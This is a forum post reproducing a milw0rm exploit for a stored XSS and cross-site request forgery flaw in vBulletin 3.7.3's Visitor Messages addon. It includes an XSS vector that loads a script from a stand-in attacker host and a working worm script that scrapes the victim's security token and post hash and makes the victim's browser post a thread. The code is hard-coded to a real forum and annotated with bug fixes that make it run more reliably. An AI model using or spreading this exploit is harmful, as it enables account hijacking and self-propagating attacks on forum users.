dRuNNNk Posted September 25, 2009
/* -----------------------------
 * Author   = Mx
 * Title    = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
 * Software = vBulletin
 * Addon    = Visitor Messages
 * Version  = 3.7.3
 * Attack   = XSS/XSRF
 * Description = A critical vulnerability exists in the new vBulletin 3.7.3 software, which ships
 *   with the Visitor Messages addon (a clone of a social-network wall/comment area).
 *   When an XSS payload is posted as a visitor message, the data is run through htmlentities()
 *   before being displayed to the general public/forum members. However, when a new message is
 *   posted, a notification is also sent to the commentee. The commenter posts an XSS vector such as
 *   <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
 *   on the forum's own domain, they are hit with the unfiltered XSS payload. Because that payload
 *   now runs in the forum's origin, it can read the per-session securitytoken and posthash from
 *   the new-thread form -- values a plain cross-site form post could never supply -- so XSRF is
 *   readily available as well. The example worm below does exactly that: it makes the victim post
 *   a new thread with an attacker-chosen subject and message. Note that the example is hard-coded
 *   to one forum installation and one forum id.
 * Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com, which was the first subject
 * of the attack method.
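* ----------------------------- */

// Hard-coded target of the example worm. FORUM_BASE is the vBulletin root and
// FORUM_ID the forum the victim is made to post into; both were baked into the
// URLs below in the original and are only lifted out so the example reads clearly.
var FORUM_BASE = 'http://digitalgangster.com/4um/';
var FORUM_ID = 5;

// Subject and body of the thread the victim's browser is made to post.
var WORM_SUBJECT = 'subject text';
var WORM_MESSAGE = 'message text';

// Returns an XMLHttpRequest-compatible object, trying the two legacy IE ActiveX
// names first (this was written in 2008) and falling back to the native object.
function getNewHttpObject() {
    var objType = false;
    try {
        objType = new ActiveXObject('Msxml2.XMLHTTP');
    } catch (e) {
        try {
            objType = new ActiveXObject('Microsoft.XMLHTTP');
        } catch (e2) {
            objType = new XMLHttpRequest();
        }
    }
    return objType;
}

// Pulls the two per-session values a vBulletin 3.7 post requires out of a page:
// SECURITYTOKEN (embedded in a script block as `var SECURITYTOKEN = "..."`) and
// the hidden `posthash` form field. Returns { securitytoken, posthash }, or null
// when either marker (or its closing quote) is missing. The original sliced fixed
// widths (51 and 32 characters) without checking that indexOf() found anything;
// reading up to the closing quote gives the same result for well-formed pages and
// fails cleanly otherwise.
function extractFormTokens(html) {
    var SEC_MARK = 'var SECURITYTOKEN = "';
    var POST_MARK = 'posthash" value="';
    var secloc = html.indexOf(SEC_MARK);
    var posloc = html.indexOf(POST_MARK);
    if (secloc < 0 || posloc < 0) {
        return null;
    }
    var secStart = secloc + SEC_MARK.length;
    var secEnd = html.indexOf('"', secStart);
    var postStart = posloc + POST_MARK.length;
    var postEnd = html.indexOf('"', postStart);
    if (secEnd < 0 || postEnd < 0) {
        return null;
    }
    return {
        securitytoken: html.substring(secStart, secEnd),
        posthash: html.substring(postStart, postEnd)
    };
}

// Fetches the "new thread" form at `url` with the victim's session (same-origin
// XHR sends the forum cookies automatically) and, on success, scrapes the
// securitytoken and posthash from it and submits the thread via postAXAH().
// This is the step that needs the XSS: only a script running in the forum's
// origin can read those values.
function getAXAH(url) {
    var theHttpRequest = getNewHttpObject();
    theHttpRequest.onreadystatechange = function () {
        processAXAH();
    };
    theHttpRequest.open("GET", url);
    theHttpRequest.send(null); // GET has no body; the original passed `false`

    function processAXAH() {
        if (theHttpRequest.readyState != 4 || theHttpRequest.status != 200) {
            return;
        }
        var tokens = extractFormTokens(theHttpRequest.responseText);
        if (tokens === null) {
            // Markers not found (page layout differs or the victim is not logged
            // in); there is nothing valid to post with, so stop instead of
            // sending garbage.
            return;
        }
        // Field order mirrors the original form post. subject/message are
        // URL-encoded; the original sent them raw, so any space or '&' in them
        // would have corrupted the body.
        postAXAH(FORUM_BASE + 'newthread.php?do=postthread&f=' + FORUM_ID,
            'subject=' + encodeURIComponent(WORM_SUBJECT) +
            '&message=' + encodeURIComponent(WORM_MESSAGE) +
            '&wysiwyg=0&taglist=&iconid=0&s=' +
            '&securitytoken=' + tokens.securitytoken +
            '&f=' + FORUM_ID + '&do=postthread' +
            '&posthash=' + tokens.posthash +
            // The original omitted this '&', which glued "poststarttime=1" onto
            // the posthash value and dropped the poststarttime field entirely.
            '&poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread' +
            '&signature=1&parseurl=1&emailupdate=0&polloptions=4');
    }
}

// POSTs a urlencoded form body to `url` in the victim's session. The reply is
// not inspected. The original handler was invoked as processAXAHr(elementContainer)
// with `elementContainer` never defined, which raised a ReferenceError inside
// onreadystatechange on every state change.
function postAXAH(url, params) {
    var theHttpRequest = getNewHttpObject();
    theHttpRequest.onreadystatechange = function () {
        processAXAHr();
    };
    theHttpRequest.open("POST", url);
    theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
    theHttpRequest.send(params);

    function processAXAHr() {
        // Fire-and-forget: nothing is done with the response.
    }
}

// Entry point. Guarded so the helpers above can be loaded (and unit-tested)
// outside a browser; in a browser `document` always exists and this runs as
// before. The iframe presumably shows the victim the real new-thread page --
// the original left the tag unclosed, which would swallow any markup after it.
if (typeof document !== 'undefined') {
    getAXAH(FORUM_BASE + 'newthread.php?do=newthread&f=' + FORUM_ID);
    document.write('<iframe src="' + FORUM_BASE + 'newthread.php?do=newthread&f=' + FORUM_ID + '"></iframe>');
}

// milw0rm.com [2008-11-20]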
Guest vini4p Posted December 23, 2009 "vBulletin 3.7.3 Visitor Messages XSS" — este greu să citești ce scrie?